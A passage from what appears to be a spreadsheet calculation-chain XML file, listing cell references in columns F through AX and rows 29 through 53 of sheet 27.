  <c r="AI29" i="27" s="1"/>
  <c r="AF29" i="27"/>
  <c r="AG29" i="27"/>
  <c r="AJ29" i="27"/>
  <c r="AN29" i="27" s="1"/>
  <c r="AK29" i="27"/>
  <c r="AL29" i="27"/>
  <c r="AO29" i="27"/>
  <c r="AS29" i="27" s="1"/>
  <c r="AP29" i="27"/>
  <c r="AQ29" i="27"/>
  <c r="AT29" i="27"/>
  <c r="AX29" i="27" s="1"/>
  <c r="AU29" i="27"/>
  <c r="AV29" i="27"/>
  <c r="F30" i="27"/>
  <c r="J30" i="27" s="1"/>
  <c r="G30" i="27"/>
  <c r="H30" i="27"/>
  <c r="K30" i="27"/>
  <c r="O30" i="27" s="1"/>
  <c r="L30" i="27"/>
  <c r="M30" i="27"/>
  <c r="P30" i="27"/>
  <c r="T30" i="27" s="1"/>
  <c r="Q30" i="27"/>
  <c r="R30" i="27"/>
  <c r="U30" i="27"/>
  <c r="Y30" i="27" s="1"/>
  <c r="V30" i="27"/>
  <c r="W30" i="27"/>
  <c r="Z30" i="27"/>
  <c r="AD30" i="27" s="1"/>
  <c r="AA30" i="27"/>
  <c r="AB30" i="27"/>
  <c r="AC30" i="27"/>
  <c r="AE30" i="27"/>
  <c r="AI30" i="27" s="1"/>
  <c r="AF30" i="27"/>
  <c r="AG30" i="27"/>
  <c r="AJ30" i="27"/>
  <c r="AN30" i="27" s="1"/>
  <c r="AK30" i="27"/>
  <c r="AL30" i="27"/>
  <c r="AO30" i="27"/>
  <c r="AS30" i="27" s="1"/>
  <c r="AP30" i="27"/>
  <c r="AQ30" i="27"/>
  <c r="AT30" i="27"/>
  <c r="AX30" i="27" s="1"/>
  <c r="AU30" i="27"/>
  <c r="AV30" i="27"/>
  <c r="F31" i="27"/>
  <c r="J31" i="27" s="1"/>
  <c r="G31" i="27"/>
  <c r="H31" i="27"/>
  <c r="K31" i="27"/>
  <c r="O31" i="27" s="1"/>
  <c r="L31" i="27"/>
  <c r="M31" i="27"/>
  <c r="P31" i="27"/>
  <c r="T31" i="27" s="1"/>
  <c r="Q31" i="27"/>
  <c r="R31" i="27"/>
  <c r="U31" i="27"/>
  <c r="Y31" i="27" s="1"/>
  <c r="V31" i="27"/>
  <c r="W31" i="27"/>
  <c r="Z31" i="27"/>
  <c r="AD31" i="27" s="1"/>
  <c r="AA31" i="27"/>
  <c r="AB31" i="27"/>
  <c r="AC31" i="27"/>
  <c r="AE31" i="27"/>
  <c r="AI31" i="27" s="1"/>
  <c r="AF31" i="27"/>
  <c r="AG31" i="27"/>
  <c r="AJ31" i="27"/>
  <c r="AN31" i="27" s="1"/>
  <c r="AK31" i="27"/>
  <c r="AL31" i="27"/>
  <c r="AO31" i="27"/>
  <c r="AS31" i="27" s="1"/>
  <c r="AP31" i="27"/>
  <c r="AQ31" i="27"/>
  <c r="AT31" i="27"/>
  <c r="AX31" i="27" s="1"/>
  <c r="AU31" i="27"/>
  <c r="AV31" i="27"/>
  <c r="F32" i="27"/>
  <c r="J32" i="27" s="1"/>
  <c r="G32" i="27"/>
  <c r="H32" i="27"/>
  <c r="K32" i="27"/>
  <c r="O32" i="27" s="1"/>
  <c r="L32" i="27"/>
  <c r="M32" i="27"/>
  <c r="P32" i="27"/>
  <c r="T32" i="27" s="1"/>
  <c r="Q32" i="27"/>
  <c r="R32" i="27"/>
  <c r="U32" i="27"/>
  <c r="Y32" i="27" s="1"/>
  <c r="V32" i="27"/>
  <c r="W32" i="27"/>
  <c r="Z32" i="27"/>
  <c r="AD32" i="27" s="1"/>
  <c r="AA32" i="27"/>
  <c r="AB32" i="27"/>
  <c r="AC32" i="27"/>
  <c r="AE32" i="27"/>
  <c r="AI32" i="27" s="1"/>
  <c r="AF32" i="27"/>
  <c r="AG32" i="27"/>
  <c r="AJ32" i="27"/>
  <c r="AN32" i="27" s="1"/>
  <c r="AK32" i="27"/>
  <c r="AL32" i="27"/>
  <c r="AO32" i="27"/>
  <c r="AS32" i="27" s="1"/>
  <c r="AP32" i="27"/>
  <c r="AQ32" i="27"/>
  <c r="AT32" i="27"/>
  <c r="AX32" i="27" s="1"/>
  <c r="AU32" i="27"/>
  <c r="AV32" i="27"/>
  <c r="F33" i="27"/>
  <c r="J33" i="27" s="1"/>
  <c r="G33" i="27"/>
  <c r="H33" i="27"/>
  <c r="K33" i="27"/>
  <c r="O33" i="27" s="1"/>
  <c r="L33" i="27"/>
  <c r="M33" i="27"/>
  <c r="P33" i="27"/>
  <c r="T33" i="27" s="1"/>
  <c r="Q33" i="27"/>
  <c r="R33" i="27"/>
  <c r="U33" i="27"/>
  <c r="Y33" i="27" s="1"/>
  <c r="V33" i="27"/>
  <c r="W33" i="27"/>
  <c r="Z33" i="27"/>
  <c r="AD33" i="27" s="1"/>
  <c r="AA33" i="27"/>
  <c r="AB33" i="27"/>
  <c r="AC33" i="27"/>
  <c r="AE33" i="27"/>
  <c r="AI33" i="27" s="1"/>
  <c r="AF33" i="27"/>
  <c r="AG33" i="27"/>
  <c r="AJ33" i="27"/>
  <c r="AN33" i="27" s="1"/>
  <c r="AK33" i="27"/>
  <c r="AL33" i="27"/>
  <c r="AO33" i="27"/>
  <c r="AS33" i="27" s="1"/>
  <c r="AP33" i="27"/>
  <c r="AQ33" i="27"/>
  <c r="AT33" i="27"/>
  <c r="AX33" i="27" s="1"/>
  <c r="AU33" i="27"/>
  <c r="AV33" i="27"/>
  <c r="F34" i="27"/>
  <c r="J34" i="27" s="1"/>
  <c r="G34" i="27"/>
  <c r="H34" i="27"/>
  <c r="K34" i="27"/>
  <c r="O34" i="27" s="1"/>
  <c r="L34" i="27"/>
  <c r="M34" i="27"/>
  <c r="P34" i="27"/>
  <c r="T34" i="27" s="1"/>
  <c r="Q34" i="27"/>
  <c r="R34" i="27"/>
  <c r="U34" i="27"/>
  <c r="Y34" i="27" s="1"/>
  <c r="V34" i="27"/>
  <c r="W34" i="27"/>
  <c r="Z34" i="27"/>
  <c r="AD34" i="27" s="1"/>
  <c r="AA34" i="27"/>
  <c r="AB34" i="27"/>
  <c r="AC34" i="27"/>
  <c r="AE34" i="27"/>
  <c r="AI34" i="27" s="1"/>
  <c r="AF34" i="27"/>
  <c r="AG34" i="27"/>
  <c r="AJ34" i="27"/>
  <c r="AN34" i="27" s="1"/>
  <c r="AK34" i="27"/>
  <c r="AL34" i="27"/>
  <c r="AO34" i="27"/>
  <c r="AS34" i="27" s="1"/>
  <c r="AP34" i="27"/>
  <c r="AQ34" i="27"/>
  <c r="AT34" i="27"/>
  <c r="AX34" i="27" s="1"/>
  <c r="AU34" i="27"/>
  <c r="AV34" i="27"/>
  <c r="F35" i="27"/>
  <c r="J35" i="27" s="1"/>
  <c r="G35" i="27"/>
  <c r="H35" i="27"/>
  <c r="K35" i="27"/>
  <c r="O35" i="27" s="1"/>
  <c r="L35" i="27"/>
  <c r="M35" i="27"/>
  <c r="P35" i="27"/>
  <c r="T35" i="27" s="1"/>
  <c r="Q35" i="27"/>
  <c r="R35" i="27"/>
  <c r="U35" i="27"/>
  <c r="Y35" i="27" s="1"/>
  <c r="V35" i="27"/>
  <c r="W35" i="27"/>
  <c r="Z35" i="27"/>
  <c r="AD35" i="27" s="1"/>
  <c r="AA35" i="27"/>
  <c r="AB35" i="27"/>
  <c r="AC35" i="27"/>
  <c r="AE35" i="27"/>
  <c r="AI35" i="27" s="1"/>
  <c r="AF35" i="27"/>
  <c r="AG35" i="27"/>
  <c r="AJ35" i="27"/>
  <c r="AN35" i="27" s="1"/>
  <c r="AK35" i="27"/>
  <c r="AL35" i="27"/>
  <c r="AO35" i="27"/>
  <c r="AS35" i="27" s="1"/>
  <c r="AP35" i="27"/>
  <c r="AQ35" i="27"/>
  <c r="AT35" i="27"/>
  <c r="AX35" i="27" s="1"/>
  <c r="AU35" i="27"/>
  <c r="AV35" i="27"/>
  <c r="F36" i="27"/>
  <c r="J36" i="27" s="1"/>
  <c r="G36" i="27"/>
  <c r="H36" i="27"/>
  <c r="K36" i="27"/>
  <c r="O36" i="27" s="1"/>
  <c r="L36" i="27"/>
  <c r="M36" i="27"/>
  <c r="P36" i="27"/>
  <c r="T36" i="27" s="1"/>
  <c r="Q36" i="27"/>
  <c r="R36" i="27"/>
  <c r="U36" i="27"/>
  <c r="Y36" i="27" s="1"/>
  <c r="V36" i="27"/>
  <c r="W36" i="27"/>
  <c r="Z36" i="27"/>
  <c r="AD36" i="27" s="1"/>
  <c r="AA36" i="27"/>
  <c r="AB36" i="27"/>
  <c r="AC36" i="27"/>
  <c r="AE36" i="27"/>
  <c r="AI36" i="27" s="1"/>
  <c r="AF36" i="27"/>
  <c r="AG36" i="27"/>
  <c r="AJ36" i="27"/>
  <c r="AN36" i="27" s="1"/>
  <c r="AK36" i="27"/>
  <c r="AL36" i="27"/>
  <c r="AO36" i="27"/>
  <c r="AS36" i="27" s="1"/>
  <c r="AP36" i="27"/>
  <c r="AQ36" i="27"/>
  <c r="AT36" i="27"/>
  <c r="AX36" i="27" s="1"/>
  <c r="AU36" i="27"/>
  <c r="AV36" i="27"/>
  <c r="F37" i="27"/>
  <c r="J37" i="27" s="1"/>
  <c r="G37" i="27"/>
  <c r="H37" i="27"/>
  <c r="K37" i="27"/>
  <c r="O37" i="27" s="1"/>
  <c r="L37" i="27"/>
  <c r="M37" i="27"/>
  <c r="P37" i="27"/>
  <c r="T37" i="27" s="1"/>
  <c r="Q37" i="27"/>
  <c r="R37" i="27"/>
  <c r="U37" i="27"/>
  <c r="Y37" i="27" s="1"/>
  <c r="V37" i="27"/>
  <c r="W37" i="27"/>
  <c r="Z37" i="27"/>
  <c r="AD37" i="27" s="1"/>
  <c r="AA37" i="27"/>
  <c r="AB37" i="27"/>
  <c r="AC37" i="27"/>
  <c r="AE37" i="27"/>
  <c r="AI37" i="27" s="1"/>
  <c r="AF37" i="27"/>
  <c r="AG37" i="27"/>
  <c r="AJ37" i="27"/>
  <c r="AN37" i="27" s="1"/>
  <c r="AK37" i="27"/>
  <c r="AL37" i="27"/>
  <c r="AO37" i="27"/>
  <c r="AS37" i="27" s="1"/>
  <c r="AP37" i="27"/>
  <c r="AQ37" i="27"/>
  <c r="AT37" i="27"/>
  <c r="AX37" i="27" s="1"/>
  <c r="AU37" i="27"/>
  <c r="AV37" i="27"/>
  <c r="F38" i="27"/>
  <c r="J38" i="27" s="1"/>
  <c r="G38" i="27"/>
  <c r="H38" i="27"/>
  <c r="K38" i="27"/>
  <c r="O38" i="27" s="1"/>
  <c r="L38" i="27"/>
  <c r="M38" i="27"/>
  <c r="P38" i="27"/>
  <c r="T38" i="27" s="1"/>
  <c r="Q38" i="27"/>
  <c r="R38" i="27"/>
  <c r="U38" i="27"/>
  <c r="Y38" i="27" s="1"/>
  <c r="V38" i="27"/>
  <c r="W38" i="27"/>
  <c r="Z38" i="27"/>
  <c r="AD38" i="27" s="1"/>
  <c r="AA38" i="27"/>
  <c r="AB38" i="27"/>
  <c r="AC38" i="27"/>
  <c r="AE38" i="27"/>
  <c r="AI38" i="27" s="1"/>
  <c r="AF38" i="27"/>
  <c r="AG38" i="27"/>
  <c r="AJ38" i="27"/>
  <c r="AN38" i="27" s="1"/>
  <c r="AK38" i="27"/>
  <c r="AL38" i="27"/>
  <c r="AO38" i="27"/>
  <c r="AS38" i="27" s="1"/>
  <c r="AP38" i="27"/>
  <c r="AQ38" i="27"/>
  <c r="AT38" i="27"/>
  <c r="AX38" i="27" s="1"/>
  <c r="AU38" i="27"/>
  <c r="AV38" i="27"/>
  <c r="F39" i="27"/>
  <c r="J39" i="27" s="1"/>
  <c r="G39" i="27"/>
  <c r="H39" i="27"/>
  <c r="K39" i="27"/>
  <c r="O39" i="27" s="1"/>
  <c r="L39" i="27"/>
  <c r="M39" i="27"/>
  <c r="P39" i="27"/>
  <c r="T39" i="27" s="1"/>
  <c r="Q39" i="27"/>
  <c r="R39" i="27"/>
  <c r="U39" i="27"/>
  <c r="Y39" i="27" s="1"/>
  <c r="V39" i="27"/>
  <c r="W39" i="27"/>
  <c r="Z39" i="27"/>
  <c r="AD39" i="27" s="1"/>
  <c r="AA39" i="27"/>
  <c r="AB39" i="27"/>
  <c r="AC39" i="27"/>
  <c r="AE39" i="27"/>
  <c r="AI39" i="27" s="1"/>
  <c r="AF39" i="27"/>
  <c r="AG39" i="27"/>
  <c r="AJ39" i="27"/>
  <c r="AN39" i="27" s="1"/>
  <c r="AK39" i="27"/>
  <c r="AL39" i="27"/>
  <c r="AO39" i="27"/>
  <c r="AS39" i="27" s="1"/>
  <c r="AP39" i="27"/>
  <c r="AQ39" i="27"/>
  <c r="AT39" i="27"/>
  <c r="AX39" i="27" s="1"/>
  <c r="AU39" i="27"/>
  <c r="AV39" i="27"/>
  <c r="F40" i="27"/>
  <c r="J40" i="27" s="1"/>
  <c r="G40" i="27"/>
  <c r="H40" i="27"/>
  <c r="K40" i="27"/>
  <c r="O40" i="27" s="1"/>
  <c r="L40" i="27"/>
  <c r="M40" i="27"/>
  <c r="P40" i="27"/>
  <c r="T40" i="27" s="1"/>
  <c r="Q40" i="27"/>
  <c r="R40" i="27"/>
  <c r="U40" i="27"/>
  <c r="Y40" i="27" s="1"/>
  <c r="V40" i="27"/>
  <c r="W40" i="27"/>
  <c r="Z40" i="27"/>
  <c r="AD40" i="27" s="1"/>
  <c r="AA40" i="27"/>
  <c r="AB40" i="27"/>
  <c r="AC40" i="27"/>
  <c r="AE40" i="27"/>
  <c r="AI40" i="27" s="1"/>
  <c r="AF40" i="27"/>
  <c r="AG40" i="27"/>
  <c r="AJ40" i="27"/>
  <c r="AN40" i="27" s="1"/>
  <c r="AK40" i="27"/>
  <c r="AL40" i="27"/>
  <c r="AO40" i="27"/>
  <c r="AS40" i="27" s="1"/>
  <c r="AP40" i="27"/>
  <c r="AQ40" i="27"/>
  <c r="AT40" i="27"/>
  <c r="AX40" i="27" s="1"/>
  <c r="AU40" i="27"/>
  <c r="AV40" i="27"/>
  <c r="F41" i="27"/>
  <c r="J41" i="27" s="1"/>
  <c r="G41" i="27"/>
  <c r="H41" i="27"/>
  <c r="K41" i="27"/>
  <c r="O41" i="27" s="1"/>
  <c r="L41" i="27"/>
  <c r="M41" i="27"/>
  <c r="P41" i="27"/>
  <c r="T41" i="27" s="1"/>
  <c r="Q41" i="27"/>
  <c r="R41" i="27"/>
  <c r="U41" i="27"/>
  <c r="Y41" i="27" s="1"/>
  <c r="V41" i="27"/>
  <c r="W41" i="27"/>
  <c r="Z41" i="27"/>
  <c r="AD41" i="27" s="1"/>
  <c r="AA41" i="27"/>
  <c r="AB41" i="27"/>
  <c r="AC41" i="27"/>
  <c r="AE41" i="27"/>
  <c r="AI41" i="27" s="1"/>
  <c r="AF41" i="27"/>
  <c r="AG41" i="27"/>
  <c r="AJ41" i="27"/>
  <c r="AN41" i="27" s="1"/>
  <c r="AK41" i="27"/>
  <c r="AL41" i="27"/>
  <c r="AO41" i="27"/>
  <c r="AS41" i="27" s="1"/>
  <c r="AP41" i="27"/>
  <c r="AQ41" i="27"/>
  <c r="AT41" i="27"/>
  <c r="AX41" i="27" s="1"/>
  <c r="AU41" i="27"/>
  <c r="AV41" i="27"/>
  <c r="F42" i="27"/>
  <c r="J42" i="27" s="1"/>
  <c r="G42" i="27"/>
  <c r="H42" i="27"/>
  <c r="K42" i="27"/>
  <c r="O42" i="27" s="1"/>
  <c r="L42" i="27"/>
  <c r="M42" i="27"/>
  <c r="P42" i="27"/>
  <c r="T42" i="27" s="1"/>
  <c r="Q42" i="27"/>
  <c r="R42" i="27"/>
  <c r="U42" i="27"/>
  <c r="Y42" i="27" s="1"/>
  <c r="V42" i="27"/>
  <c r="W42" i="27"/>
  <c r="Z42" i="27"/>
  <c r="AD42" i="27" s="1"/>
  <c r="AA42" i="27"/>
  <c r="AB42" i="27"/>
  <c r="AC42" i="27"/>
  <c r="AE42" i="27"/>
  <c r="AI42" i="27" s="1"/>
  <c r="AF42" i="27"/>
  <c r="AG42" i="27"/>
  <c r="AJ42" i="27"/>
  <c r="AN42" i="27" s="1"/>
  <c r="AK42" i="27"/>
  <c r="AL42" i="27"/>
  <c r="AO42" i="27"/>
  <c r="AS42" i="27" s="1"/>
  <c r="AP42" i="27"/>
  <c r="AQ42" i="27"/>
  <c r="AT42" i="27"/>
  <c r="AX42" i="27" s="1"/>
  <c r="AU42" i="27"/>
  <c r="AV42" i="27"/>
  <c r="F43" i="27"/>
  <c r="J43" i="27" s="1"/>
  <c r="G43" i="27"/>
  <c r="H43" i="27"/>
  <c r="K43" i="27"/>
  <c r="O43" i="27" s="1"/>
  <c r="L43" i="27"/>
  <c r="M43" i="27"/>
  <c r="P43" i="27"/>
  <c r="T43" i="27" s="1"/>
  <c r="Q43" i="27"/>
  <c r="R43" i="27"/>
  <c r="U43" i="27"/>
  <c r="Y43" i="27" s="1"/>
  <c r="V43" i="27"/>
  <c r="W43" i="27"/>
  <c r="Z43" i="27"/>
  <c r="AD43" i="27" s="1"/>
  <c r="AA43" i="27"/>
  <c r="AB43" i="27"/>
  <c r="AC43" i="27"/>
  <c r="AE43" i="27"/>
  <c r="AI43" i="27" s="1"/>
  <c r="AF43" i="27"/>
  <c r="AG43" i="27"/>
  <c r="AJ43" i="27"/>
  <c r="AN43" i="27" s="1"/>
  <c r="AK43" i="27"/>
  <c r="AL43" i="27"/>
  <c r="AO43" i="27"/>
  <c r="AS43" i="27" s="1"/>
  <c r="AP43" i="27"/>
  <c r="AQ43" i="27"/>
  <c r="AT43" i="27"/>
  <c r="AX43" i="27" s="1"/>
  <c r="AU43" i="27"/>
  <c r="AV43" i="27"/>
  <c r="F44" i="27"/>
  <c r="J44" i="27" s="1"/>
  <c r="G44" i="27"/>
  <c r="H44" i="27"/>
  <c r="K44" i="27"/>
  <c r="O44" i="27" s="1"/>
  <c r="L44" i="27"/>
  <c r="M44" i="27"/>
  <c r="P44" i="27"/>
  <c r="T44" i="27" s="1"/>
  <c r="Q44" i="27"/>
  <c r="R44" i="27"/>
  <c r="U44" i="27"/>
  <c r="Y44" i="27" s="1"/>
  <c r="V44" i="27"/>
  <c r="W44" i="27"/>
  <c r="Z44" i="27"/>
  <c r="AD44" i="27" s="1"/>
  <c r="AA44" i="27"/>
  <c r="AB44" i="27"/>
  <c r="AC44" i="27"/>
  <c r="AE44" i="27"/>
  <c r="AI44" i="27" s="1"/>
  <c r="AF44" i="27"/>
  <c r="AG44" i="27"/>
  <c r="AJ44" i="27"/>
  <c r="AN44" i="27" s="1"/>
  <c r="AK44" i="27"/>
  <c r="AL44" i="27"/>
  <c r="AO44" i="27"/>
  <c r="AS44" i="27" s="1"/>
  <c r="AP44" i="27"/>
  <c r="AQ44" i="27"/>
  <c r="AT44" i="27"/>
  <c r="AX44" i="27" s="1"/>
  <c r="AU44" i="27"/>
  <c r="AV44" i="27"/>
  <c r="F45" i="27"/>
  <c r="J45" i="27" s="1"/>
  <c r="G45" i="27"/>
  <c r="H45" i="27"/>
  <c r="K45" i="27"/>
  <c r="O45" i="27" s="1"/>
  <c r="L45" i="27"/>
  <c r="M45" i="27"/>
  <c r="P45" i="27"/>
  <c r="T45" i="27" s="1"/>
  <c r="Q45" i="27"/>
  <c r="R45" i="27"/>
  <c r="U45" i="27"/>
  <c r="Y45" i="27" s="1"/>
  <c r="V45" i="27"/>
  <c r="W45" i="27"/>
  <c r="Z45" i="27"/>
  <c r="AD45" i="27" s="1"/>
  <c r="AA45" i="27"/>
  <c r="AB45" i="27"/>
  <c r="AC45" i="27"/>
  <c r="AE45" i="27"/>
  <c r="AI45" i="27" s="1"/>
  <c r="AF45" i="27"/>
  <c r="AG45" i="27"/>
  <c r="AJ45" i="27"/>
  <c r="AN45" i="27" s="1"/>
  <c r="AK45" i="27"/>
  <c r="AL45" i="27"/>
  <c r="AO45" i="27"/>
  <c r="AS45" i="27" s="1"/>
  <c r="AP45" i="27"/>
  <c r="AQ45" i="27"/>
  <c r="AT45" i="27"/>
  <c r="AX45" i="27" s="1"/>
  <c r="AU45" i="27"/>
  <c r="AV45" i="27"/>
  <c r="F46" i="27"/>
  <c r="J46" i="27" s="1"/>
  <c r="G46" i="27"/>
  <c r="H46" i="27"/>
  <c r="K46" i="27"/>
  <c r="O46" i="27" s="1"/>
  <c r="L46" i="27"/>
  <c r="M46" i="27"/>
  <c r="P46" i="27"/>
  <c r="T46" i="27" s="1"/>
  <c r="Q46" i="27"/>
  <c r="R46" i="27"/>
  <c r="U46" i="27"/>
  <c r="Y46" i="27" s="1"/>
  <c r="V46" i="27"/>
  <c r="W46" i="27"/>
  <c r="Z46" i="27"/>
  <c r="AD46" i="27" s="1"/>
  <c r="AA46" i="27"/>
  <c r="AB46" i="27"/>
  <c r="AC46" i="27"/>
  <c r="AE46" i="27"/>
  <c r="AI46" i="27" s="1"/>
  <c r="AF46" i="27"/>
  <c r="AG46" i="27"/>
  <c r="AJ46" i="27"/>
  <c r="AN46" i="27" s="1"/>
  <c r="AK46" i="27"/>
  <c r="AL46" i="27"/>
  <c r="AO46" i="27"/>
  <c r="AS46" i="27" s="1"/>
  <c r="AP46" i="27"/>
  <c r="AQ46" i="27"/>
  <c r="AT46" i="27"/>
  <c r="AX46" i="27" s="1"/>
  <c r="AU46" i="27"/>
  <c r="AV46" i="27"/>
  <c r="F47" i="27"/>
  <c r="J47" i="27" s="1"/>
  <c r="G47" i="27"/>
  <c r="H47" i="27"/>
  <c r="K47" i="27"/>
  <c r="O47" i="27" s="1"/>
  <c r="L47" i="27"/>
  <c r="M47" i="27"/>
  <c r="P47" i="27"/>
  <c r="T47" i="27" s="1"/>
  <c r="Q47" i="27"/>
  <c r="R47" i="27"/>
  <c r="U47" i="27"/>
  <c r="Y47" i="27" s="1"/>
  <c r="V47" i="27"/>
  <c r="W47" i="27"/>
  <c r="Z47" i="27"/>
  <c r="AD47" i="27" s="1"/>
  <c r="AA47" i="27"/>
  <c r="AB47" i="27"/>
  <c r="AC47" i="27"/>
  <c r="AE47" i="27"/>
  <c r="AI47" i="27" s="1"/>
  <c r="AF47" i="27"/>
  <c r="AG47" i="27"/>
  <c r="AJ47" i="27"/>
  <c r="AN47" i="27" s="1"/>
  <c r="AK47" i="27"/>
  <c r="AL47" i="27"/>
  <c r="AO47" i="27"/>
  <c r="AS47" i="27" s="1"/>
  <c r="AP47" i="27"/>
  <c r="AQ47" i="27"/>
  <c r="AT47" i="27"/>
  <c r="AX47" i="27" s="1"/>
  <c r="AU47" i="27"/>
  <c r="AV47" i="27"/>
  <c r="F48" i="27"/>
  <c r="J48" i="27" s="1"/>
  <c r="G48" i="27"/>
  <c r="H48" i="27"/>
  <c r="K48" i="27"/>
  <c r="O48" i="27" s="1"/>
  <c r="L48" i="27"/>
  <c r="M48" i="27"/>
  <c r="P48" i="27"/>
  <c r="T48" i="27" s="1"/>
  <c r="Q48" i="27"/>
  <c r="R48" i="27"/>
  <c r="U48" i="27"/>
  <c r="Y48" i="27" s="1"/>
  <c r="V48" i="27"/>
  <c r="W48" i="27"/>
  <c r="Z48" i="27"/>
  <c r="AD48" i="27" s="1"/>
  <c r="AA48" i="27"/>
  <c r="AB48" i="27"/>
  <c r="AC48" i="27"/>
  <c r="AE48" i="27"/>
  <c r="AI48" i="27" s="1"/>
  <c r="AF48" i="27"/>
  <c r="AG48" i="27"/>
  <c r="AJ48" i="27"/>
  <c r="AN48" i="27" s="1"/>
  <c r="AK48" i="27"/>
  <c r="AL48" i="27"/>
  <c r="AO48" i="27"/>
  <c r="AS48" i="27" s="1"/>
  <c r="AP48" i="27"/>
  <c r="AQ48" i="27"/>
  <c r="AT48" i="27"/>
  <c r="AX48" i="27" s="1"/>
  <c r="AU48" i="27"/>
  <c r="AV48" i="27"/>
  <c r="F49" i="27"/>
  <c r="J49" i="27" s="1"/>
  <c r="G49" i="27"/>
  <c r="H49" i="27"/>
  <c r="K49" i="27"/>
  <c r="O49" i="27" s="1"/>
  <c r="L49" i="27"/>
  <c r="M49" i="27"/>
  <c r="P49" i="27"/>
  <c r="T49" i="27" s="1"/>
  <c r="Q49" i="27"/>
  <c r="R49" i="27"/>
  <c r="U49" i="27"/>
  <c r="Y49" i="27" s="1"/>
  <c r="V49" i="27"/>
  <c r="W49" i="27"/>
  <c r="Z49" i="27"/>
  <c r="AD49" i="27" s="1"/>
  <c r="AA49" i="27"/>
  <c r="AB49" i="27"/>
  <c r="AC49" i="27"/>
  <c r="AE49" i="27"/>
  <c r="AI49" i="27" s="1"/>
  <c r="AF49" i="27"/>
  <c r="AG49" i="27"/>
  <c r="AJ49" i="27"/>
  <c r="AN49" i="27" s="1"/>
  <c r="AK49" i="27"/>
  <c r="AL49" i="27"/>
  <c r="AO49" i="27"/>
  <c r="AS49" i="27" s="1"/>
  <c r="AP49" i="27"/>
  <c r="AQ49" i="27"/>
  <c r="AT49" i="27"/>
  <c r="AX49" i="27" s="1"/>
  <c r="AU49" i="27"/>
  <c r="AV49" i="27"/>
  <c r="F50" i="27"/>
  <c r="J50" i="27" s="1"/>
  <c r="G50" i="27"/>
  <c r="H50" i="27"/>
  <c r="K50" i="27"/>
  <c r="O50" i="27" s="1"/>
  <c r="L50" i="27"/>
  <c r="M50" i="27"/>
  <c r="P50" i="27"/>
  <c r="T50" i="27" s="1"/>
  <c r="Q50" i="27"/>
  <c r="R50" i="27"/>
  <c r="U50" i="27"/>
  <c r="Y50" i="27" s="1"/>
  <c r="V50" i="27"/>
  <c r="W50" i="27"/>
  <c r="Z50" i="27"/>
  <c r="AD50" i="27" s="1"/>
  <c r="AA50" i="27"/>
  <c r="AB50" i="27"/>
  <c r="AC50" i="27"/>
  <c r="AE50" i="27"/>
  <c r="AI50" i="27" s="1"/>
  <c r="AF50" i="27"/>
  <c r="AG50" i="27"/>
  <c r="AJ50" i="27"/>
  <c r="AN50" i="27" s="1"/>
  <c r="AK50" i="27"/>
  <c r="AL50" i="27"/>
  <c r="AO50" i="27"/>
  <c r="AS50" i="27" s="1"/>
  <c r="AP50" i="27"/>
  <c r="AQ50" i="27"/>
  <c r="AT50" i="27"/>
  <c r="AX50" i="27" s="1"/>
  <c r="AU50" i="27"/>
  <c r="AV50" i="27"/>
  <c r="F51" i="27"/>
  <c r="J51" i="27" s="1"/>
  <c r="G51" i="27"/>
  <c r="H51" i="27"/>
  <c r="K51" i="27"/>
  <c r="O51" i="27" s="1"/>
  <c r="L51" i="27"/>
  <c r="M51" i="27"/>
  <c r="P51" i="27"/>
  <c r="T51" i="27" s="1"/>
  <c r="Q51" i="27"/>
  <c r="R51" i="27"/>
  <c r="U51" i="27"/>
  <c r="Y51" i="27" s="1"/>
  <c r="V51" i="27"/>
  <c r="W51" i="27"/>
  <c r="Z51" i="27"/>
  <c r="AD51" i="27" s="1"/>
  <c r="AA51" i="27"/>
  <c r="AB51" i="27"/>
  <c r="AC51" i="27"/>
  <c r="AE51" i="27"/>
  <c r="AI51" i="27" s="1"/>
  <c r="AF51" i="27"/>
  <c r="AG51" i="27"/>
  <c r="AJ51" i="27"/>
  <c r="AN51" i="27" s="1"/>
  <c r="AK51" i="27"/>
  <c r="AL51" i="27"/>
  <c r="AO51" i="27"/>
  <c r="AS51" i="27" s="1"/>
  <c r="AP51" i="27"/>
  <c r="AQ51" i="27"/>
  <c r="AT51" i="27"/>
  <c r="AX51" i="27" s="1"/>
  <c r="AU51" i="27"/>
  <c r="AV51" i="27"/>
  <c r="F52" i="27"/>
  <c r="J52" i="27" s="1"/>
  <c r="G52" i="27"/>
  <c r="H52" i="27"/>
  <c r="K52" i="27"/>
  <c r="O52" i="27" s="1"/>
  <c r="L52" i="27"/>
  <c r="M52" i="27"/>
  <c r="P52" i="27"/>
  <c r="T52" i="27" s="1"/>
  <c r="Q52" i="27"/>
  <c r="R52" i="27"/>
  <c r="U52" i="27"/>
  <c r="Y52" i="27" s="1"/>
  <c r="V52" i="27"/>
  <c r="W52" i="27"/>
  <c r="Z52" i="27"/>
  <c r="AD52" i="27" s="1"/>
  <c r="AA52" i="27"/>
  <c r="AB52" i="27"/>
  <c r="AC52" i="27"/>
  <c r="AE52" i="27"/>
  <c r="AI52" i="27" s="1"/>
  <c r="AF52" i="27"/>
  <c r="AG52" i="27"/>
  <c r="AJ52" i="27"/>
  <c r="AN52" i="27" s="1"/>
  <c r="AK52" i="27"/>
  <c r="AL52" i="27"/>
  <c r="AO52" i="27"/>
  <c r="AS52" i="27" s="1"/>
  <c r="AP52" i="27"/>
  <c r="AQ52" i="27"/>
  <c r="AT52" i="27"/>
  <c r="AX52" i="27" s="1"/>
  <c r="AU52" i="27"/>
  <c r="AV52" i="27"/>
  <c r="F53" i="27"/>
  <c r="J53" i="27" s="1"/>
  <c r="G53" i="27"/>
  <c r="H53" i="27"/>
  <c r="K53" i="27"/>
  <c r="O53" i="27" s="1"/>
  <c r="L53" i="27"/>
  <c r="M53" i="27"/>
  <c r="P53" i="27"/>
  <c r="T53" i="27" s="1"/>
  <c r="Q53" i="27"/>
  <c r="R53" i="27"/>
  <c r="U53" i="27"/>
  <c r="Y53" i="27" s="1"/>
  <c r="V53" i="27"/>
  <c r="W53" i="27"/>
  <c r="Z53" i="27"/>
  <c r="AD53" i="27" s="1"/>
  <c r="AA53" i="27"/>
  <c r="AB53" i="27"/>
  <c r="AC53" i="27"/>
  <c r="AE53" i="27"/>
  <c r="AI53" i="27" s="1"/>
  <c r="AF53" i="27"/>
  <c r="AG53" i="27"/>
  <c r="AJ53" i="27"/>
  <c r="AN53" i="27" s="1"/>
  <c r="AK53" i="27"/>
  <c r="AL53" i="27"/>
  <c r="AO53" i="27"/>
  <c r="AS53" i="27" s="1"/>
  <c r="AP53" i="27"/>
  <c r="AQ53" i="27"/>
  <c r="AT53" i="27"/>
